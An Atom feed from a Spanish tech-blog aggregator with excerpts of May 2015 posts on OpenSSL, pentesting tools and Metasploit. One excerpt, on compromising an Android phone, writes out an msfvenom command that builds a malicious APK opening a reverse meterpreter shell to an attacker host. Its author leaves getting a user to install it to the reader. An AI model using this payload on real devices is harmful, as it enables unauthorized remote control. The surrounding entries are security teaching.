<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <title>Blog Stack</title>
  <link rel="alternate" href="http://www.blogstack.info" />
  <subtitle>Un poco más que un agregador/planeta de bitácoras sobre programación, desarrollo, software libre, gnu/linux, tecnología, ...</subtitle>
  <updated>2015-05-25T09:02:23Z</updated>
  <dc:creator>Blog Stack</dc:creator>
  <dc:date>2015-05-25T09:02:23Z</dc:date>
  <dc:language>es</dc:language>
  <entry>
    <title>Servidor web seguro (HTTPS) en C usando openSSL (pruebas)</title>
    <link rel="alternate" href="http://www.blogstack.info/post/poesiabinaria/2015/05/servidor-web-seguro-https-en-c-usando-openssl-pruebas" />
    <category term="contrasena" />
    <category term="certificado" />
    <category term="peticiones" />
    <category term="seguridad" />
    <category term="servidor" />
    <category term="sockets" />
    <category term="firma" />
    <category term="autoridad" />
    <category term="conexion" />
    <category term="web" />
    <category term="c-c" />
    <category term="servidores" />
    <category term="encriptar" />
    <category term="autofirmado" />
    <category term="ssl" />
    <category term="certificadora" />
    <category term="general" />
    <category term="aceptar" />
    <category term="comunicacion" />
    <author>
      <name>Gaspar Fernández</name>
    </author>
    <updated>2015-05-25T08:03:09Z</updated>
    <published>2015-05-25T08:03:09Z</published>
    <content type="html">&lt;p&gt;Hace unos días veíamos un ejemplo de un cliente web SSL con ayuda de openSSL. Ahora vamos a hacer un servidor al que se pueda conectar. Se trata sólo de una prueba de concepto, nada que podamos utilizar en el mundo real, pero está bien para ver cómo funciona la biblioteca. Creando un certificado auto-firmado Lo primero que vamos a hacer es crear una llave y un certificado para utilizarlos. Como estamos probando y no vamos a gastar dinero ni nada en un certificado, podemos crear un autofirmado, ya sabéis, los navegadores no nos detectarán como fuentes de confianza pero tendremos una conexión segura. Para ello, nos ponemos en un directorio de confianza (vamos a colocar ahí archivos sensibles, al menos vamos a crearlos ahí… por lo menos que no sea una carpeta compartida en emule) y en nuestra[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/poesiabinaria/2015/05/servidor-web-seguro-https-en-c-usando-openssl-pruebas"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Gaspar Fernández</dc:creator>
    <dc:date>2015-05-25T08:03:09Z</dc:date>
  </entry>
  <entry>
    <title>Evento en Directo – Presentación del Proyecto IT TALKS</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/evento-en-directo-presentacion-del-proyecto-it-talks" />
    <category term="it-talks" />
    <category term="linux" />
    <category term="generales" />
    <category term="seguridad" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-20T14:24:18Z</updated>
    <published>2015-05-20T14:24:18Z</published>
    <content type="html">&lt;p&gt;Como saben tuvimos unos problemas para emitir el evento el domingo pasado como lo teníamos programado, Y en conversación con SniferL4bs reprogramamos para este domingo que viene. Acompañanos en este Primer Hangout donde mi persona Jason Soto @Jsitech y Jose Moruno Cadima @SniferL4bs presentan el proyecto de IT TALKS. Veremos De que se trata? Conoce quiénes están detrás de IT TALKS Que pueden esperar? Nuestro Objetivo? Vamos a hablar un poco del proyecto de Cápsulas de Seguridad Informática iniciado por Jose Moruno Cadima “La cita es el Domingo 24 de Mayo a las 8:00PM” Pueden seguir la transmisión aqui mismo.   Link de Interés Página del Evento en Google+[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/evento-en-directo-presentacion-del-proyecto-it-talks"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-20T14:24:18Z</dc:date>
  </entry>
  <entry>
    <title>Comprometiendo un Equipo Android con Metasploit</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/comprometiendo-un-equipo-android-con-metasploit" />
    <category term="metasploit" />
    <category term="ethical-hacking" />
    <category term="android" />
    <category term="seguridad" />
    <category term="msfvenom" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-16T22:13:52Z</updated>
    <published>2015-05-16T22:13:52Z</published>
    <content type="html">&lt;p&gt;Una de mis herramientas de seguridad favorita es Metasploit, y es por todas las funcionalidades que este framework nos da para realizar pruebas de seguridad a diversas plataformas. Hoy vamos a ver como podemos comprometer un equipo Android simplemente creando un APK malicioso que haga una conexión a nuestra máquina atacante, solo veremos lo de crear el ataque, la parte de lograr que su usuario instale y ejecute el APK, se los dejo a ustedes. Este post lo realizo usando, un Motorola con Android 4.4, Kali Linux y Metasploit. Para crear el APK Malicioso vamos a utilizar MSFvenom y nuestra máquina atacante es la 10.0.0.11 Creamos el Archivo Malicioso # msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.11 LPORT=4444 &gt; kali.apk Si verificamos, nos creo un archivo kali.apk, este es el que debemos[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/comprometiendo-un-equipo-android-con-metasploit"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-16T22:13:52Z</dc:date>
  </entry>
  <entry>
    <title>Cápsulas de Seguridad Informática – Wireless Pentesting desde 0</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/capsulas-de-seguridad-informatica-wireless-pentesting-desde" />
    <category term="ethical-hacking" />
    <category term="seguridad" />
    <category term="capsulassi" />
    <category term="pentesting" />
    <category term="wireless" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-16T17:31:16Z</updated>
    <published>2015-05-16T17:31:16Z</published>
    <content type="html">&lt;p&gt;Hoy les presento una nueva cápsula con una temática bastante interesante, y es que Snifer anda muy inalámbrico ultimamente ya que anda preparándose para rendir una certificación de Offensive Security, OSWP. Es por esta razón que creó esta sección de las cápsulas dedicado al Pentesting de Redes Wireless. Un tema muy interesante y se que muchos le sacarán provecho. Aquí los dejo con los 2 videos que ya están disponible, pero antes quiero decir, que todo lo que vean en las cápsulas es para fines educativos y todos los ataques deben ser ejecutados en un ambiente de pruebas o donde tengan la autorización para hacerlo. Presentación de la Cápsula Wireless Pentesting desde 0 Wireless Pentesting desde 0 – Configurando Nuestro Laboratorio Wireless Aquí les dejo las otras series que estamos llevando.[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/capsulas-de-seguridad-informatica-wireless-pentesting-desde"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-16T17:31:16Z</dc:date>
  </entry>
  <entry>
    <title>Introduciendo PenTesters Framework (PTF)</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/introduciendo-pentesters-framework-ptf" />
    <category term="ptf" />
    <category term="ethical-hacking" />
    <category term="tools" />
    <category term="seguridad" />
    <category term="pentesting" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-14T20:28:36Z</updated>
    <published>2015-05-14T20:28:36Z</published>
    <content type="html">&lt;p&gt;Trustedsec ha anunciado el lanzamiento de una herramienta bastante interesante denominada PenTesters Framework (PTF). PTF es una herramienta desarrollada en Python diseñada específicamente para funcionar bajo Distribuciones basadas en Debian o Ubuntu, para convertirlas en distros ideales para las pruebas de penetración. El objetivo de la herramienta es la de instalar diversas herramientas para los Test de Penetracion, y que puedan ser actualizadas de forma sencilla en cualquier distribución. Todo esta organizado de manera que siga los lineamientos del Estándar de ejecución de Test de penetración, PTES ( Penetration Testing Execution Standard), eliminando todo lo que usualmente no se utiliza. PTF simplifica la instalación y el empaquetamiento de las herramientas, y crea todo un framework para[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/introduciendo-pentesters-framework-ptf"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-14T20:28:36Z</dc:date>
  </entry>
  <entry>
    <title>InstaRecon – Reconocimiento automatizado de Subdominios y algo mas</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/instarecon-reconocimiento-automatizado-de-subdominios-y-algo-mas" />
    <category term="reconocimiento" />
    <category term="ethical-hacking" />
    <category term="tools" />
    <category term="seguridad" />
    <category term="instarecon" />
    <category term="pentesting" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-14T15:07:04Z</updated>
    <published>2015-05-14T15:07:04Z</published>
    <content type="html">&lt;p&gt;Una de las fases cuando estamos realizando un test de penetración a un objetivo es el reconocimiento, donde buscamos conocer un poco más sobre nuestro objetivo. Actualmente contamos con muchas herramientas que nos dan una mano en esta parte y pues me he topado con otra que automatiza un poco esto, pero en el área de la búsqueda de subdominios, IP’s, DNS y demás, esta herramienta es InstaRecon. InstaRecon es una herramienta de reconocimiento digital automatizada desarrollada en Python. Está enfocada en asistir en la fase de reconocimiento, footprinting inicial de los objetivos y el descubrimiento de subdominios. Características Búsquedas DNS ( Directo, MX, NS, PTR) Whois ( Dominios/IP) Uso de Google Dorks en la Búsqueda de SubDominios Búsquedas en Shodan Búsquedas DNS Inversas en el Rango de[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/instarecon-reconocimiento-automatizado-de-subdominios-y-algo-mas"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-14T15:07:04Z</dc:date>
  </entry>
  <entry>
    <title>Msfpayload y Msfencode pronto se van – Hola Msfvenom</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/msfpayload-y-msfencode-pronto-se-van-hola-msfvenom" />
    <category term="metasploit" />
    <category term="ethical-hacking" />
    <category term="seguridad" />
    <category term="msfvenom" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-13T23:18:03Z</updated>
    <published>2015-05-13T23:18:03Z</published>
    <content type="html">&lt;p&gt;Es de conocimiento que el equipo de Metasploit tomó la decisión de retirar msfpayload y msfencode, así que dejaron de soportar y aceptar parches para estas utilidades. El 8 de Junio del presente año ya estas utilidades serán retiradas de los repo de Metasploit y reemplazado por su sucesor Msfvenom. Msfvenom es una combinación de msfpayload y msfencode y aunque las opciones son algo parecidas vamos a ver algunos ejemplos de uso de esta herramienta para los que aún no la han utilizado. Primero veamos las opciones: # msfvenom -h Si queremos ver los payloads que podemos crear, encoders que podemos usar y demas con la herramienta simplemente le pasamos la opcion -l con la información que necesitamos. # msfvenom -l payloads Si queremos ver los payloads para un sistema en especifico, pues podemos[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/msfpayload-y-msfencode-pronto-se-van-hola-msfvenom"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-13T23:18:03Z</dc:date>
  </entry>
</feed>

